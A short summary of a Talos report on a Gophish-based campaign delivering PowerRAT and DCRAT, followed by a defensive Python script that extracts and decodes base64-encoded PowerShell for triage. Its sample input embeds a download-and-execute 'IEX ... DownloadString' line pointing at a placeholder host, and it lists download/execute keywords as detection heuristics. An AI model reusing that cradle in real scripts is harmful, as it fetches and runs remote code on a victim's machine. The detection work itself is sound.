Threat actor abuses Gophish to deliver new PowerRAT and DCRAT
Cisco Talos recently discovered a phishing campaign by an unknown threat actor that uses the open-source phishing toolkit Gophish. The campaign involves modular infection chains that are either Maldoc- or HTML-based and require the victim's intervention to trigger the infection chain. Talos discovered an undocumented PowerShell RAT, which it is calling PowerRAT, as one of the payloads, alongside another infamous Remote Access Tool (RAT), DCRAT. Cisco found a few placeholders for base64-encoded PowerShell scripts in PowerRAT, indicating that the threat actor is actively developing their tools.
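The summary notes that PowerRAT carries base64-encoded PowerShell scripts. A defender triaging a suspicious script or a process-creation log line wants to find such blobs and see what they decode to. The following is an added example, not code from Cisco Talos or from the campaign it describes: it scans arbitrary text for base64 runs, decodes each as UTF-16LE (the encoding `powershell -EncodedCommand` expects) and then as UTF-8, and reports the ones that decode to PowerShell-looking content. The sample script body, the keyword list and the stage-two string are constructed for the example and are not indicators from the campaign.

```python
import base64
import re

# Keywords that commonly appear in decoded PowerShell download/execute stages.
# Constructed heuristic list for this example, not a Talos detection signature.
PS_KEYWORDS = (
    "iex", "invoke-expression", "new-object", "downloadstring",
    "frombase64string", "net.webclient", "start-process",
)

# A run of base64 alphabet characters long enough to be a script rather than
# an incidental token (40+ chars), with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_candidates(blob: str):
    """Yield plausible plaintext decodings of one base64 run.

    UTF-16LE is tried first because that is what -EncodedCommand uses;
    UTF-8 is tried second for scripts embedded via FromBase64String.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # bad alphabet or padding: not base64 at all
        return
    for encoding in ("utf-16le", "utf-8"):
        try:
            yield raw.decode(encoding)
        except UnicodeDecodeError:
            continue


def looks_like_powershell(text: str) -> bool:
    """Cheap check that decoded text contains PowerShell-style cmdlets or APIs."""
    lowered = text.lower()
    return any(keyword in lowered for keyword in PS_KEYWORDS)


def find_encoded_powershell(text: str):
    """Return a list of (base64_blob, decoded_script) pairs found in `text`.

    Works on script bodies and on process command lines alike, since both
    are just text containing base64 runs.
    """
    hits = []
    for match in B64_RUN.finditer(text):
        blob = match.group(0)
        for decoded in decode_candidates(blob):
            if looks_like_powershell(decoded):
                hits.append((blob, decoded))
                break  # first convincing decoding wins
    return hits


# Constructed sample input: a harmless stage-two string embedded as UTF-16LE
# base64 (the -EncodedCommand convention), plus a benign base64 blob of
# repeated bytes that must NOT be flagged. Neither comes from the real malware.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_SCRIPT = (
    "$p = '" + base64.b64encode(STAGE2.encode("utf-16le")).decode() + "'\n"
    "$q = '" + base64.b64encode(b"A" * 60).decode() + "'\n"
    "$placeholder = ''\n"
)

if __name__ == "__main__":
    for blob, decoded in find_encoded_powershell(SAMPLE_SCRIPT):
        print(f"encoded PowerShell found ({len(blob)} b64 chars): {decoded}")
```

The heuristic is deliberately loose: it is a triage aid for pulling decoded stages out of a sample or a `powershell.exe -enc ...` command line, not a standalone detection rule, and a decoded stage that itself contains further base64 can be fed back through `find_encoded_powershell` to peel the next layer.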